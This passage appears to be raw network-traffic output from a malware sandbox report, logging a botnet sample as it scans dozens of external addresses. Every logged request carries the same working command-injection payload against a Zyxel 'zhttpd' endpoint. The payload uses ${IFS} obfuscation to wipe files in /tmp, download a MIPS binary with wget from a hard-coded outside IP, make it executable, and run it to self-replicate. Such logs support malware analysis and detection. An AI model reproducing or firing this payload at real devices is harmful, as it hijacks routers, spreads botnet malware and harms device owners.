                                                Jan 12, 2024 18:16:41.887295961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9092192.168.2.234974263.72.56.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887343884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9093192.168.2.2355378209.189.129.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887377977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9094192.168.2.235649463.253.105.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887403011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9095192.168.2.2358596150.132.79.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887435913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9096192.168.2.2345790212.246.34.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887489080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9097192.168.2.2358486178.41.85.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887525082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9098192.168.2.2353620115.178.197.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887574911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9099192.168.2.2356556142.95.11.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887619019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9100192.168.2.235488070.34.227.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887660027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9101192.168.2.234114876.201.109.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887710094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9102192.168.2.2343430175.29.63.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887749910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9103192.168.2.2355900175.233.199.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887779951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9104192.168.2.2359576101.186.0.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887813091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9105192.168.2.2355862166.26.238.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887845993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9106192.168.2.2347358102.111.6.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887896061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9107192.168.2.235792840.165.170.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887931108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9108192.168.2.234125457.239.40.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887973070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9109192.168.2.236029878.0.227.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888020992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9110192.168.2.235717459.83.189.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888029099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9111192.168.2.233529858.49.28.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888084888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9112192.168.2.234092879.25.59.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888139009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9113192.168.2.2342110125.196.156.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888168097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9114192.168.2.2360828161.73.54.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888199091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9115192.168.2.234247266.217.252.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888237000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9116192.168.2.2356762112.143.83.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888298988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9117192.168.2.2349728146.210.10.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888328075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9118192.168.2.2345926105.98.177.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888376951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9119192.168.2.2353224163.109.178.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888418913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9120192.168.2.2337998212.137.121.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888456106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9121192.168.2.234299844.169.127.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888501883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9122192.168.2.234314664.19.116.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888529062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9123192.168.2.233631857.56.225.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888556004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9124192.168.2.23603302.64.225.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888598919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9125192.168.2.2357302186.27.137.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888645887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9126192.168.2.2356880116.73.238.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888659954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9127192.168.2.2357528149.25.89.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888701916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9128192.168.2.2334002119.42.137.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888737917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9129192.168.2.2348194221.210.255.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888789892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9130192.168.2.2351260217.80.175.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888844967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9131192.168.2.2350986185.62.86.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888894081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9132192.168.2.2360988177.8.223.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888899088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9133192.168.2.2342372168.179.166.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888926029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9134192.168.2.2335812186.65.111.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.888988972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9135192.168.2.234195266.247.57.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889022112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9136192.168.2.235956681.118.224.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889054060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9137192.168.2.2340580206.93.200.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889091969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9138192.168.2.235766494.33.146.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889152050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9139192.168.2.234295672.144.228.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889179945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9140192.168.2.2338052156.222.232.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889211893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9141192.168.2.2343780217.62.129.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889264107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9142192.168.2.234860836.1.117.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889286041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9143192.168.2.2352408191.122.21.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889328957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9144192.168.2.235626232.102.254.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889385939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9145192.168.2.2341232172.230.36.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889408112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9146192.168.2.2339198160.36.66.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889427900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9147192.168.2.234654012.143.142.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889488935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9148192.168.2.235916065.195.35.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889525890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9149192.168.2.233738253.174.119.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889571905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9150192.168.2.2346112125.32.233.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889600039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9151192.168.2.2333852156.151.20.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889631987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9152192.168.2.2337978123.158.211.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889693975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9153192.168.2.233346496.32.241.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889744043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9154192.168.2.2358458160.238.52.11443
                                                TimestampBytes transferredDirectionData
